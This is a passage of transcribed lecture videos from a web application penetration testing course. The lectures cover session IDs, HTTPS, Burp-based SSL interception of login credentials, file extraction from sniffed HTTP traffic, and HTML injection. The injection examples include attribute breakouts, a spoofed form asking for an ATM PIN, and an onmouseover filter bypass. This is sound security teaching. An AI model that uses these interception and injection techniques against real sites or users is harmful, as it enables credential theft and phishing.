delete it, right? So, I would highly recommend, if you get time to learn a bit of Python, then you can figure out how to delete these cookies and all of that as well. And really this video, in my opinion, was to give you a taste of how all of this is programmed on the server side, right? Fantastic. Let's come back in here. So I've talked about the installations you require. I've looked at the cookie, the blog, the forum, and I think that brings us to the end of this video. I would really appreciate, guys, that if you like Pentester Academy, please do recommend to your friends and colleagues. We are really working hard to ensure that Pentester Academy can give you the best quality training I physically can produce with whatever knowledge I may have, and we really hope that this will be valuable for the whole information security community, right? Feel free to tweet to us on SecurityTube or connect with us on Facebook, and we are always happy to hear from you, right? So that's all for this video. Thank you. Hello all, welcome to the Web Application Pentesting course on Pentester Academy. In this video, we will look at session IDs. So what is a session ID? Very simply put, it is supposed to be a unique identifier or token which is used by the web application to go ahead and again uniquely identify a user session. Now, it is important to note here that both authenticated as well as unauthenticated users may be provided session IDs. Really, to be frank, it just depends on the application logic and what the developer has done. More on session ID is available in Wikipedia if you're interested in a much more formal definition. So where is a session ID stored? Right? Again, multiple possibilities. It can be stored in the URL. It can be stored as a form field, typically hidden form fields. It can be part of your cookie, or there could be other interesting ways to put it in as well. Now, what would be your ideal session ID? Now, typically, session ID, given it is supposed to be unique to a given user, for a given session he's having with the web application, it is something which should not be easily duplicable. And that is why an ideal session ID would have to be really long. This ensures that nobody can crack it with brute force attacks and things like that. It should be random. You can have something long, but what if someone can guess the sequence in which you're creating it, right? So it should not follow any simple mathematical sequence. It should be really as random as possible. Third, the name should not suggest the functionality, right? So for example, a session ID which says, authenticated user equals whatever is the session ID, or tracking, underscore user equals whatever is the long session ID which you've given. Ideally, you should not make the name suggest the functionality, because this gives potential pen testers and hackers really good clues into which one of these session IDs is of importance to them, right? Fourth, session IDs should automatically time out and typically should never be recycled, which is reused, right? Because imagine if the application never times out a session ID, then that session ID from the client's browser can be stolen by an attacker if he breaks into the machine, or maybe is viewed in transit if there is no SSL and everything goes in as plain text. There are so many other possibilities. So ideally, time out your session IDs and try never to recycle them and reuse them. Fifth, you should not try to derive your session ID from shared secrets like passwords or usernames or anything which an attacker can easily guess, right? Or on the other end, if the session ID is compromised, an attacker should not be able to derive things like password, usernames, or any shared secret, right? This actually is really an extension of the second one, which is make it random, right? Do not derive it from known values, which could go ahead and make it predictable, right? Finally, depending on the application, let's say you have an banking application, something which is of critical importance, ensure that the session ID, however you send it, in the form of a cookie, part of a form, or whatever you may choose, it should be sent over a secure channel, which in the web world means HTTPS. Now, if you look at all the different problems which can arise in session IDs, it is really if a developer ends up skipping any of these rules. So if it is not long enough, an attacker could just brute force it. If it is not random but follows a sequence, an attacker can do session ID analysis and figure out the sequence. If the name suggests the functionality, then you've made the attacker's job very, very simple, so that he can now focus only on that specific session ID and discard any other cookies or anything else which you may have put in. If it doesn't time out, doesn't recycle, then again, this is prone to attacks in the future. And if you use known quantities to derive it, if the attacker manages to get his hands on a session ID, he could reverse the process and derive things like passwords from it. And finally, without a secure channel, in today's world when people access web applications in coffee shops, hotspots, over their mobile phones, again over insecure Wi-Fi, you're pretty much going to lose the keys to the kingdom, right? Now, I've put out a bunch of session ID challenges. So if you look at the web application challenges section, challenge 9, 10, and 11 should have session ID challenges. Now, you know me, I never like to close a video without any form of practical demo in it. So let's do a quick demo to look at, how session IDs and, cookies and all of that interplaying together could become very complicated from an analysis perspective. So I opened up Iceweasel. I'm going to go ahead and set my proxy settings again to localhost 8080 so that I can run burp. I'm going into privacy and I'm going to ensure I clear my recent history. This is so that we can start on a clean slate. And then I'm going to start burp. So really all I'm trying to show you is in a commercial web application, you could have multiple session IDs, or even honestly IDs you don't even know what it's being used for, right? So that's how complicated real world apps can get. And if you go ahead and violate any of those golden rules which we spoke about, or rather a developer violates, then it just makes the attacker's life easy, right? So okay, let's go in here. Let's say go to yahoo.com. Burp is waiting for us. So right now, if you notice, there is no cookie, nothing being sent. Let me forward this request. In response, Yahoo seems to be going ahead and setting up really long cookie values, right? FPC equals D equals something really, really long, right? This could be a session ID for an unauthenticated user. As I said, a lot of this stuff also depends on how the developer is using it. So we can only guess at this time based on this very simple initial analysis. So forwarded that. And now, look at this. You have so many of these little things being set here. FPC, you have FPT, FPC underscore S, and just look at the size of these, right? Really, really long and seems to be quite unpredictable, right? And if you notice, even the names are not very predictable. I mean, you could probably go and see what the page is doing and try and guess what the names mean, but at first glance, FPT, FPC doesn't seem to be too predictable, right? Fantastic. So I think once you get into the challenges, you will get a taste of what can happen if you go ahead, or if rather the developer goes ahead and creates session IDs in an insecure way. So that's all for this video. If you like Pentester Academy, I would really appreciate and be thankful if you can recommend us to your friends and colleagues in the information security community. We are really trying to reinvent and revolutionize and honestly disrupt this space by providing ongoing training at the most affordable price in the industry. And we really need all the help we can get from you guys. Also, please do connect with us on Twitter and Facebook. I always love hearing from you. That's all for this video. Thank you. Hello all. Welcome to the Web Application Pentesting course on Pentester Academy. In this video, we will look at transport layer protection using SSL. Now, you probably all already guessed that HTTP is plain text, and the problems come because of that, including the fact that it is insecure and anyone can eavesdrop on your connection. Now in today's world, this becomes a really major concern because most of us end up using insecure Wi-Fi networks in coffee shops, airports, and other public places where any HTTP traffic can be sniffed by an attacker having wireless attack tools. Now, because of what might be sent over HTTP, which includes usernames, passwords, session IDs, important one-time cookies, and whatnot, it is possible that an attacker manages to compromise or hijack your session. And hence, for anything important, HTTP is not a good idea. So what do we do then? And this is where we have HTTPS, which is really transport layer protection. Now, very simply put, HTTPS, what it does is it creates an encrypted tunnel first using public-private cryptography, and then within that encrypted tunnel, all our data, which could be credentials, just plain data, cookies, session IDs, everything gets tunneled into that encrypted hole. Now, HTTPS typically uses port 443. However, just like any other service, it can be run on other ports as well. So now the question is, how does HTTPS really look like? Now, I'm going to do two small exercises. One is using the PCAP file, which is available for download below. And once you save that PCAP file and open it in Wireshark, you should basically have a screen which looks like this. Now, we will see that there are a lot of messages in here, including multiple client hello messages. I can at least see two of them. So the easiest way to look at just one SSL session, which is, we connect, we negotiate the encryption, we create the tunnel and send data. The easiest way is to go ahead and first find an application data packet and right click that. In the trace file, it's packet 21. That's the number of the packet, as you can see. Right click that and say follow SSL stream, right? Close that window, and this gives us one full SSL connection from beginning to end. Now let's quickly look at this, and truth be told, I'm not trying to be able to explain the encryption behind SSL. The simple reason is that would be a course more on mathematics and cryptography than web application pen testing. However, if there are a lot of people who would like me to do a crypto course as well, always you can use the feedback form, and the moment we finish the existing ones, I can do a crypto course for you. Okay, so I'll leave it to you. So coming back, we first have our typical TCP SYN, SYNAC, ACK three-way handshake, and after that, the client sends the client hello message to the server. Now, this message contains a lot of interesting things. Now, as I said, I'm not going to take you through each and every smaller aspects of the protocol. I would rather touch on very high level points which are of interest to us. So if we expand the packet, we see it's a client hello packet. And you would notice that there is an area in here called cipher suites. It says 36 of them listed, and these are all the different ciphers which are supported by your browser currently, or the client rather, right? So really what the client is doing is it is telling the server, hey, I support and speak all of these crypto possibilities. Select one of these and let me know which one I should use, right? And preference, of course, is going to be from top to bottom. Now, there are other interesting things here as well, such as session ID. You have a bunch of random values and all of that. And this gets used later on while creating and negotiating keys and all the other stuff, right? So just keep that in mind. We needn't get into the details. The other interesting part of this message is called server_name. And really this is almost like the host header in HTTP. What this really does is this gives you the name of the server, such as a local host. Now, this first example is using the trace file collected between a server and a client running on the same machine. After we do this, we'll do a live collection for a site like PayPal, and we may end up seeing other values in here, right? So this is the first message, client hello, and this is responded back by the server with a server hello, the certificate, and the server hello done, right? In this case, all of them are in the same message. When you look at a live internet traffic, you may even find them spread over multiple packets. So here is the server hello. If you kind of scroll down in here, if you notice in the cipher suite, the server has chosen one of the encryption possibilities proposed by the client, and this is what is going to be used by both the client and the server from now on. Again, server underscore name, this is the extension which we saw before in the client as well, right? Then this doesn't evaluate to anything in here. Now, apart from this, the interesting part really, if I collapse this, is the certificate, right? This is actually the certificate sent by the server to the client. And if you notice, it says here the size of the certificate is 1042. You can open it up, further breaks it up into other possibilities. And you can clearly see here a lot of stuff which should probably make sense. As you notice, it says the signature, the serial number, the issuer, right? Blah, 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 a lot of stuff in here. And finally, you see something called encrypted. It seems to be a very long random value, right? This is really the signature in the certificate which your browser is going to verify using the different CAs it has installed, right? So this is where certificate verification comes in, right? And you can actually go ahead and look at a lot of other possibilities in the certificate by opening any of these items in here. You'd see stuff like the country name and all of that possibilities also. And one of the easiest ways is really, if you notice, the certificate which I created in here was for Pentester Academy, and I can see that in the trace dump. And once I select that in here, if you notice, basically gives me all those relevant values in there, right? Pentester Academy. And then I had like West Bengal selected in here, right? Which was basically the state or province name. Calcutta selected in here. So, you know, which seems to be the ID at locality name. So if you play along and open up all these certificates, all those interesting things about, you know, the country, whatever the certificate creator has put in would all be visible to you, right? Leave that as an exercise to you. Now, after the client receives the certificate and all of that, then the actual crypto begins, where, you know, the whole keys are created for encryption and all of that. So you have the client key exchange, then you have new session ticket and all of that. And most of this is heavy on crypto. I mean, really, if you would like to kind of go ahead and remove all the crypto aspects of it, after the server hello and the certificate is being sent, pretty much both parties end up negotiating the encryption, creating the keys for encryption and all of that. And finally, the application data gets sent, right? So if you would notice, here is all the application data which is getting sent, and this is really what is your encrypted application data, right? And then that goes in, and finally the connection is stopped, right? Awesome. Now let's try and look at the exchange for a real world website. So let me go ahead and start the capture. go in here. Let's go to PayPal. And enter. So we're seeing ton of packets in here, right? Now the first filter for SSL would be TCP port equals 443. Okay, so here we go. Seem to see some client hello and server hello messages and all that. As I said, the best way really is to pick up a packet with application data in it, right click it and say follow SSL stream, so that we can basically see a full exchange with data, right? So if you notice, again we have the client hello, right, in which we pretty much have our fields which we talked about, the cipher suites and all of that, and then you have the server hello message, right, and then you have a bunch of other packets in here as well. So if you can scroll down in here, you see the certificate message in here, right? And this certificate message, can play with it a little bit. Here is the actual certificate, and you can immediately see paypal.com and a bunch of other things in here, right? This is how your client receives the certificate. And then you have the key exchanges and cipher exchanges and all of that stuff. And then finally, you have the encrypted data in here. Now, because this was a live capture, I'm sure the packet numbers and all of that may vary differently for you. But the key principles remain the same, right? Client says a hello, server says hello, certificate is sent, encryption keys are created, encryption starts, data is encrypted and sent over the network, right? And here is the final encrypted data, right? Awesome. So I think purely from a functional perspective, it should be very clear to you right now how HTTPS works. And honestly, from a pure pen testing perspective, I think this is sufficient. If you are inquisitive, you could always jump into the crypto and public-private key cryptography and all of that stuff. But it is not mandatory, right? It's only if that interests you. As far as looking at how the browser verifies the certificate and all of that, we will come to it a little later and I'll talk about it. So the next thing we will look at basically in the next video to begin with is how do we peer into an HTTPS connection, right? And I'll talk about it in the next video. If you like Pentester Academy, please do recommend to your friends and colleagues in the InfoSec domain, and do connect with us on Twitter and Facebook. That's all for this video. Thank you. Welcome to the Web Application Pen Testing course on Pentester Academy. Now in this video, we will look at SSL man in the middle using proxies. Now in the last lesson, we were really talking about how do we peer into an HTTPS connection. Now the very first way is, of course, if you are lucky enough to have access to the private key, which you can then use for decryption. Now this is almost going to be never the case unless you pretty much have administrative control over the server or have somehow managed to get the private key from the server itself, maybe by exploiting some other loophole. Now, once you have the private key, you can very easily decrypt the HTTPS traffic using Wireshark or a variety of other tools. Have a look at the challenges in the Web Application Pentest Challenge on decrypting SSL traffic to take a look at how this can be done. Now, the second option, of course, is to do a man-in-the-middle attack using a self-signed certificate, which is really what we are going to do in this video. And finally, is to use tools like SSL strip which can force an HTTPS connection into an HTTP1 by going ahead and stripping the URL and doing a bunch of other interesting stuff. Now, SSL strip will be covered in the network pen testing course because it's really more about hijacking the network connection and then making changes as traffic goes by, right? So coming back, self-signed certificate being used for an SSL MITM. Let's look at that. So I'm inside Backtrack, Kali Linux. I've already set my web browser up to pass the traffic through Burp. Let me set intercept on. Now, Burp already has created its own self-signed certificate, which it will use to help you peer into HTTPS connection. So the good news is there isn't much you need to do as a web application pen tester. Now let's go in here and let me type in an HTTPS URL. So let's say HTTPS gmail.com, right? And let me go ahead and have Burp pass the traffic through. Let me not intercept it for the time being. We hit an enter. And as you can see, if you've already used Burp once, the certificates and all of those are really cached. So let me just close the browser and restart it again, just to show you how it looks like for the very first time. I just did a quick test to ensure everything is working. That's why the certificates and all of those things have been cached. Okay, let me stop that. gmail.com, enter, and you immediately get this connection is untrusted. Now this certificate is really what Burp sends to the browser, and the browser tells you that really pretty much this isn't mail.google.com, right? That's what it tells you. So in order to do the MITM, the user would accept it. In our case, we are a web application pen tester, so we'd ideally want that we should be able to peer into the traffic, and hence we will accept the certificate. You should pretty much permanently store this exception just to be on the safer side. And if you wanted to use the look at the certificate, click on view, and you can see that Portswigger is really the organization. They are the creators of Burp, and this certificate is pretty much of them, right? So let me click on confirm security exception. Now in the case of Gmail, we are hopping between multiple domains, and hence we actually get multiple requests to accept these certificates, which I'm doing. And then finally we appear in front of our familiar Gmail page. Now let me type in an email address. Let's say demo@gmail.com, and let the password be demo password. Now let me intercept the request by turning this on. Let me click sign in. Burp lights up, and this is really the first request which goes through. You can see it's for /mail. We can clearly see the email, but I'm not able to see the password. Let me forward this. And then there is a post request to service login auth. Interesting. And if I go ahead and look at the actual content, you would actually find that here is the email and the password, right, in plain text. So email is demo@gmail.com and password is demo password. And really guys, this is how simple it can become to do an SSL man-in-the-middle attack, with which now you can peer into the entire HTTPS traffic. Of course, the password is wrong, and hence we get an error. The HTTPS traffic of any website or any URL you are trying to penetration test. Right? Now in the network pen testing course, I'll show you how you can create your own certificate and go ahead and do an MITM from the absolute grassroots level. But from a web application pen test perspective, I think Burp and many of these other application proxies pretty much allow you to do man-in-the-middle attacks out of the box, right? And I would highly recommend using them rather than creating your own network MITM based solution. So that's all for this video. You can try sending the SSL traffic through various websites and see which ones are sending the username and password in plain text. There are some of them which may even send hashes of the password, of course, which are just as insecure depending on how the hashes are stored and how they were created. So anyway, play around with it. That's all for Pentester Academy. And if you like what we do, I would really be thankful, and I would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Web Application Pentesting course on Pentester Academy. Now in this video, we will look at file extraction from HTTP traffic. Now what do I really mean by that? Now we've seen that HTTP traffic is plain text, and it is possible to see clear text username, passwords, cookies, etc. If you have a sniffer and access to the network. The simplest example would be the person uses Wi-Fi and it is insecure and does not have any encryption in places like airports, hotspots and others, right? But the big question arises, what if files are probably sent over HTTP? Example, image files, PDFs, Word documents. How would it be possible for you to extract them from the HTTP stream and probably analyze them further? Now this is where the tool of choice is TCP extract. Now TCP extract is not installed on Kali Linux by default, and you can install it by running apt-get install TCP extract. Now let me go ahead and give you a demo of this tool. So I'm going to open up a new terminal. And when we run TCP extract without any arguments, it basically tells us that it can read directly from a capture file, which is fantastic, or directly from a device. There could be a config file as well, which means one could go ahead and figure out what kind of configs it accepts, and the directory into which you wanted to dump the files it recovers from the TCP stream. Okay, so in this case, let's make it read directly from the device. Let me create a new directory called PA demo, and then let me use TCP extract -d. In my case, the network interface is ETH0, and the output directory is what we just created, PA demo. And this is running. Now here I'm going to browse a website, and then we can check if the image files and all of that are being extracted by TCP extract by sniffing the network and placing it into the directory PA demo. So let me visit securitytube.net, which seems to have a ton of images in the opening page. Okay, so the page seems to have loaded. Now, if you notice in the output of TCP extract, you actually find a ton of debug information, right? So what is this debug information? It basically says it's storing HTML files. If we scroll down, we see JPEGs being stored, PNGs being stored, BMP being stored, right? Now to look at all of this, let me go ahead and go to the home folder. It's opening. Let me go into PA demo, and basically you'll have to of course open the BMPs to see what's in, but for the ones that can show us previews, you can automatically see that we are able to recover all those images from the HTTP stream by using TCP extract, right? Fantastic. Now this is a very nifty tool and come in very handy when you even have access to offline trace files, right? Imagine during a pen test, you manage to go ahead and collect a ton of data in an offline file, and then you would want to work on it to recover images, files, data, and all of that. So the best way, again, TCP extract is probably the best stable tool out there to do the job, right? There are other tools available as well, such as DriftNet and all. However, from a stability perspective, I've seen TCP extract really beats them all. So hopefully you've enjoyed this video and learned something interesting. If you've never ever gone ahead and extracted files from the actual HTTP traffic. And I guess that's all for this video. If you enjoy Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community, and we'll be very appreciative of thankful if you can do that. Thank you very much. Hello all, welcome to the web application pentesting course on Pentester Academy. Now in this video, we will start with a new topic, HTML injection, and we will look at the basics of HTML injection in this video. So before we begin with HTML injection, let's broadly classify injection attacks as it applies to web applications. So broadly speaking, the front end or the client side can have rendering based injection attacks like HTML injection, and also client side browser based code execution such as cross-site scripting or JavaScript injection and execution attacks. Now at the back end where the server is, you can have command injection and sub-variants of that such as SQL injection. Now we will look at all of these attacks in detail in this course. This video begins with HTML injection, which is probably the simpler of them all. So what is HTML injection? Now, the user supplies input to the application, and if the application does not check and sanitize that input, but rather uses it as is to go ahead and create the HTML, then malicious input can go ahead and get injected into the page, and this can lead to the page getting rendered as per the attacker's wishes. Now, I hate just theory slides, so let's get into the actual heat of the action. You can download a very simple file called htmli.php from the link down below, and please copy it into your Kali instance. So I'm already inside Kali and I have this file copied in the temporary directory. I'm going to change to var www and create a directory in here called HTML injection and copy htmli.php in here. Let's open this PHP file. It's probably the simplest PHP file you will see. All it does is it basically takes an input parameter supplied by the user called nickname, takes its value and inserts it into the response page and basically has welcome before that and a colon after that, right? Super simple. So let me start Apache. Right, and let me look at my IP address. So I'm running Kali Linux in bridge mode. My IP address is 1.13. We go in here and I get the familiar it works. Now let me actually execute the script inside the HTML injection directory called htmli.php. Now if you notice, because no arguments have been passed to the script, it basically just prints welcome with nothing after that. Now let's actually pass the input. Nickname equals Vivek. And it basically says Vivek. And pretty much anything you end up typing in here gets reflected back with the welcome, whatever you have typed, coming back at you. Now, clearly, if you look at this file, what you would find is that we are echoing back the exact same value the user input to us back to the user, right? This is not really desirable. Why? Now, a malicious user can actually go ahead and use HTML injection. So what is HTML injection? Now, typically, the developer only wanted us to be able to maybe control the value, right? The value of nickname and then display it as he wants. Now, because he's not sanitizing my input, I can actually add HTML tags like the bold tag I've just added here, right? And because the application does not filter or sanitize, this is passed to the application, which reflects it back to the user as is. And as you can clearly see, right now Vivek is in bold. Now if you were to look at the source code of the page, you would pretty much see that this is what we have inserted, and that was sent back totally as is, right? Now of course the malicious user can add other stuff as well. For example, please click on this link and then open an A tag, give the href attribute and send him to a very nice place called Pentester Academy, and probably close the A tag as well. And if you notice, it basically says please click on this link, log in here, all the stuff which we just entered up there. And when the user clicks on this, he would be sent to Pentester Academy or any other website which the malicious user controls or may have access to, right? Now, the problem in this case specifically is because the parameter is so easily accessible and can be passed around by just copying this link and sending it to someone. It is really easy for the attacker to create a local re-rendering or defacement of the page, after which he can control what pretty much happens in there. So he could just copy this link and then send it via email, and the user may see that it is from the legitimate domain and click on it. As far as the parameter itself is concerned, even though you may argue that this does look kind of funny and may raise suspicion, typically an attacker would probably end up encoding this in some format, so that purely by visual inspection, a victim may not be able to understand anything. So the attacker could actually copy this, send it to the victim over email, and the victim may end up opening this. And if you would notice, even for the victim, whatever the attacker injected into the HTML is what gets rendered. So as simple as HTML injection attack seems to orchestrate, the repercussions of HTML injection can really be very, very bad, in the sense that right from hijacking client sessions by probably throwing them an absolutely different page, and when the client clicks there, to lure him to probably enter his username and password somewhere else, or even on the same page really, by probably even pushing in a full form on that page using HTML injection. The beauty of HTMLi is that pretty much, the developer has given the attacker a clean slate, and the attacker can draw anything on it with HTML tags, right? Great, so try this example out and hope you had fun in this video. If you're enjoying your time at Pentester Academy, we would really appreciate and be thankful if you can recommend us to your friends and colleagues in the InfoSec community. Thank you and see you in the next video. Bye-bye. Hello all, welcome to the Web Application Pentesting course on Pentester Academy. In this video, we will look at HTML injection in tag attributes. Now in the previous video, the examples which we took, the attacker went ahead and changed something in the actual content of the page, given that he could control that using the URL or maybe some other way. Now in this video, we will take up something which is a little bit more tricky, but still simple enough, which is how do you inject when what you control is really a value part of the tag attribute. So please download the file whose link is given below the video. I've already downloaded it and I'm going to copy it basically inside the var www HTML injection folder we created in the last video. So HTML tags i.php copied in here. Start the Apache server. And now let's go back in here. Check if server is up. It is. And now let's go into basically HTML injection slash HTML tags i.php, and we are passing in an additional parameter which is sid equals hello, right? Now let's actually type in something here, and if you notice visually really this value of sid or the session ID is not being updated anywhere, right? Which means definitely this is not part of the content which was rendered to the user as in the previous case. So this is a special case, and let's actually look at the actual file, the PHP file, right? So basically we have a form and then we have, the form action. Fair enough. I can see the username. Here's the username field, the password field, the submit button, and here is a hidden field called session ID, and whose value is actually passed based on user input, right? Now really what we have to do is we have to break through this jail, which is basically the value equals to and then the two quotes surrounding our input. So as you can probably imagine, if we added an extra quote to our input, then basically we would end up closing this specific value field, and if we put in an extra arrow, that would close the field itself. So let's actually do it with an example. Let me basically add first an identifier called Vivek. Then let me open up the source code, and we can clearly see value equals Vivek comes in here, right? Now let me add a double quote and see what happens. Okay, let me open up the page. If you notice right now, basically this would be the value, and interestingly your browsers and all of that are very resilient as far as broken HTML is concerned, and that's why this additional quote does not cause a problem, right? So now let me close this input tag itself by adding an extra right arrow. So let me go in here, let's add a right arrow, and if you immediately notice, this value now juts out. So let's see what happened again with view page source. So basically this is now like an extraneous value which is just lying around and which gets rendered, right? Now basically we could do a bunch of other things as well. So after this we can now add anything which would be part of the HTML. So I can again do my bold hello world, right? And if honestly we could pretty much do anything, including adding the beginning of a comments tag, which is basically a left arrow, an exclamation, 2 hyphens, and that would pretty much end up commenting everything after that. And as you can see, the rendering pretty much now removes the form entirely. And even Chrome basically tells us that the rest of the part is just comments. Now, as I said, web browsers are very tolerant towards bad HTML because honestly on the web there is a ton of bad HTML, and that's the reason why it's not giving us any visual errors or telling us that hey cannot render this page and stuff like that. So keep that in mind. Some of you who may have done things like SQL injection would probably feel a little out of place in here, because SQL injection, any small mistake, the database will scream, while your browser probably maybe with a lot of meditation has learned to keep it quiet, be calm, and render what it can with whatever intelligence was built in. Now interestingly, we could even create our own form in here, right, by replacing this existing form. So let me actually go back in. This is the original form. Let me view the page source, and let's say I would like to basically put in a new form entirely as an example. So let me open text editor. Let's make the font a little bit bigger so that we can see. Okay, so now first is the double quote to close the value, and then the right arrow so that we can go ahead and close the tag. After that, let me actually paste this form, make it all into one line just so that it's easier to illustrate and play around with it. Right, and we could maybe even add like a new value. So let's say I can actually put in ATM pin, make this hidden as well, and kind of make this ATM pin, right? Now eventually an attacker could even change the form action to point to something he controls, etc. In this case it's just an illustration, so I'm going to keep it simple. And after that, let me go ahead and use the comments tag. Now I also want to close the previous form, so I'm going to do a /form. So this ensures that the previous form is closed and now a new form starts, right? So let me copy all of this, go back in here, put this, paste it. There we go, right? If you notice, we have username, password, and ATM pin. And I can do a page source, and you would basically end up seeing that the very first form pretty much gets closed, and after that we have the second form in here with an input button which takes all of this and could be posting elsewhere also, and the remaining part is actually commented out, right? So this is how an attacker with the help of HTML injection can change the UI in a very convincing way. And as I said, this whole part in here can very simply be encoded. Tons of encoding schemas are allowed, with which it can be totally obfuscated, and even someone decently technical might not be able to figure anything out at first glance. Because honestly, session IDs or SIDs and all, you have apps where it just kind of overflows in the address bar, right? So we are already used to seeing very large random values as part of the URL, which pretty much overflows from visual site of the address bar, right? Now there are better ways of relaying the layout and all of that. And as we learn more and more advanced things in this course, we will be going through all of that. So that's all I have in mind for this video. Hopefully you've enjoyed this, and I'll be posting some challenges on HTML injection as well. So stay tuned. And thank you very much again for subscribing to Pentester Academy. And if you enjoy your time here, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. That's all. Thank you very much. Welcome to the Web Application Pentesting course on Pentester Academy. Now in this video, we will look at HTML injection attacks, but using third-party data sources. Now, what do I really mean by that? Well, in today's web world, it's really an API economy where pretty much different websites go ahead and query each other using APIs. Even applications may query websites using their respective APIs. Examples could be sites like Twitter, Facebook, where your Twitter or Facebook application pulls out all that data by communicating with web services or other endpoints on the server side. Now there are even cases where two web servers may communicate with each other using APIs. Software as a service and all of this is really going ahead and giving a huge push to third-party API-based data sourcing. Now, a lot of times an attacker can control or influence the data which the application is consuming indirectly. Let me take an example. So you can click on the URL below the video to open up this exercise. And it's a very simple application, and what it does is you can enter a URL, let's say http securitytube.net, and this goes ahead, fetches the title of that page, right? So very simple application, but of course this could be extrapolated to a lot of statistics about the page, and a lot of such data can be acquired. Now, to give you an example, a malicious attacker could create his own web page inside which he's actually going ahead and putting in tags which can lead to HTML injection. Now, typically, no other tags are allowed inside the title tag. You would not find that on a web page, and probably that could be one of the reasons a web developer may not look at that as a legitimate use case against which he needs to go ahead and escapes tags inside the title tag. Now, what could an attacker do? Well, very simply, he can go ahead and put up a web page. Now, here is the web page I have put up. You can put it up on any site or server you have access to. And it's not even a complete HTML page, to be honest. What we've done is we have the HTML tag, then the title tag, and then inside the title tag, this is not allowed, but we've kind of put in an h1 tag which really belongs under body. And then you have the close title and the close HTML. Now, when you go ahead and feed this URL to the application to probably do some analysis about the website, because the developer has not protected the input which he is gathering and sanitizing it properly, the page ends up becoming vulnerable to HTML injection, right? Now, this is a very, very interesting way by which you can do injections. And as more and more websites seem to use APIs and things like that, you would actually find that such kind of injection attacks are getting more prevalent. I've put in two interesting challenges, 18 and 19, in which you can try various other ways by which such third-party injections can be facilitated. That's all for this video. I hope you're enjoying your time here at Pentester Academy, and we would really appreciate if you can recommend us to your colleagues and friends in the InfoSec community. Thank you. Welcome to the Web Application Pentesting course on Pentester Academy. Now in this video, we will conclude the topic of HTML injection and look at filter bypass. Now really, what are filters? Now different web application frameworks have modules, libraries and APIs with which user input can be sanitized by escaping any HTML in it. So let me take an example. We'll use Python and we'll import the CGI module, which is commonly used in a lot of web applications. And let's just go ahead and define a user input string, user underscore input equals h1 tag vulnerable to HTMLi close h1 tag, right? And now if I apply CGI escape to this user underscore input, what you would find is that the less than and greater than sign are now escaped. The less than sign is represented as ampersand LT colon, while the greater than sign is represented as ampersand GT colon. Now if we add, let's say, a single quote in there, right, you would find that by default the single quote is not escaped. Now similarly, if we had defined a user input, so in Python, if you haven't done Python, the triple double quotes really means everything is pre-formatted inside. So I'm just using it so that I can accommodate the double quote, or alternately you could just use the single quote, double quote, single quote, and then you can actually put CGI underscore input 2, and you would see that by default CGI underscore CGI dot escape does not go ahead and escape quote and double quote. Now interestingly, this was something which was reported, especially the single quote one was reported as a vulnerability in CGI.escape, and says CGI.escape can lead to XSS. Now we will talk about XSS much later, but really what this means is that the single quote also should have been encoded appropriately. Now by default, basically CGI.escape goes ahead and encodes ampersand greater than and less than, and if you use an additional option quote equals true, it escapes double quote. So let's verify that. So if I do a quote equals true and feed it input 2, you would actually find that quote is escaped. However, single quotes are not escaped at all by default. Right? You can clearly see the single quote remains as is. And really, I think the maintainers of the module argued that this was expected behavior simply because they were never touting CGI.escape as some sort of a secure API against XSS and many of the other injection attacks, right? And really this brings me to an interesting point. a lot of web developers end up using many of these popular APIs and libraries available to escape HTML without really understanding their purpose. Many of them, or rather most of these libraries, were not written to prevent attacks, but rather to escape the most common, I would say, elements which can cause issues while rendering HTML, such as the greater than and the less than sign, because they also indicate like a beginning of tag, right? So any tag would be enclosed within a less than and greater than, and that's one of the reasons why it is important to escape it. Now, what would happen if a developer ended up going ahead and thinking that he could create a filter for user input using CGI.escape? This is a classic example, and you would find many such applications out there. So I've put in a simple piece of code. The email is fetched, and after that it is run through CGI.escape and then used in the application. So let me give you an example. Now I'm running this in Firefox, in which I've tested, and I'd recommend running this in Firefox. Here is the URL. You can click on this link below the video. And let's say, let me go ahead and first test the application. Now in reality, this is just challenge 16, but with filters added using CGI.escape in its default mode, which is ampersand, greater than and less than are escaped. Nothing else is escaped. So here is what I'm going to do. I'm going to use greater than, less than, ampersand, double quote and single quote. See what happens. Now if you notice, greater than, less than and ampersand seem to be escaped properly, but double quote seems to have vanished. And the simple reason being that double quote got interpreted as double quote because it wasn't escaped, and that indicated close of the value field, right? And if you notice deep down inside, the greater than, less than and all of that and the ampersand have been beautifully escaped, and hence they can't cause any problems. Now this is one example in which you can do filter evasion by now going ahead and figuring out if using the double quote is of any value, right? You can again try if single quote would work, but as one would expect, it doesn't work. It's only the double quote which ends up breaking through the jail. Let's view the source again. Breaking through the jail in here, you can clearly see, right? Now we really cannot go ahead and add an h1 tag with an open bracket and all of that, assuming the filter does its job. Of course, there are other interesting ways we will discuss later on when we do XSS more formally, but in HTML injection, we'll keep it simple, right? So one of the ways which we will visit in much more detail later on is actually to go ahead and play with something called event listeners. And this is just an FYI, when we take up XSS, we will do this in a lot of detail. So do not worry if this immediately doesn't make sense to you. So let's say put in sample, a double quote to escape the jail, and then say on mouse over equals open quote alert, right, XSS, close, colon, and leave it as is. Click, and on mouse over is really an event, and the event handler basically goes ahead and puts out XSS inside an alert box whenever we have our mouse over that field, right? So if you want to go ahead and now look at the actual source code and how we tampered it, let's go down in here. And if you notice, the sample quote ensured that the field value or rather the tag attribute value is completed. After that, we have on mouse over, the whole alert comes in, and automatically the remaining colon which was already there with the original value just to end it got automatically appended as expected, and this ended up and completed the whole on mouse over attribute value as well. Right now, do not worry if this doesn't make any sense right now. I just wanted to demonstrate that even though ampersand greater than less than may be filtered, there could be other interesting ways of bypassing filters like the one we just saw, right? We will later on take all of this up in much more detail in XSS, but with this, we will end HTML injection. Hope you've enjoyed all of these videos at Pentester Academy, and we would really appreciate and be thankful if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pentesting course on Pentester Academy. Now in this video, we will look at command injection attacks. Now very simply put, what is command injection? Now let's say a web application needs to run commands on the shell for some reason. Common examples could be converting a file, let's say a JPEG file to a PNG, converting videos, maybe checking the status of network hosts using the ping command, or people even go ahead and write out binaries to which web scripts can go ahead and pass arguments, and then the output is rendered back. So this is how a script which uses shell commands runs. Now, unfortunately, a subset of these scripts may be using user input and could be passing it along with the command to the shell. Now, if this user input is properly, or rather not properly sanitized, then a malicious user can go ahead and send multiple commands piggybacking on that one argument. When this happens, arbitrary command execution can happen on the shell, and this is what is called the command injection attack. So let me go 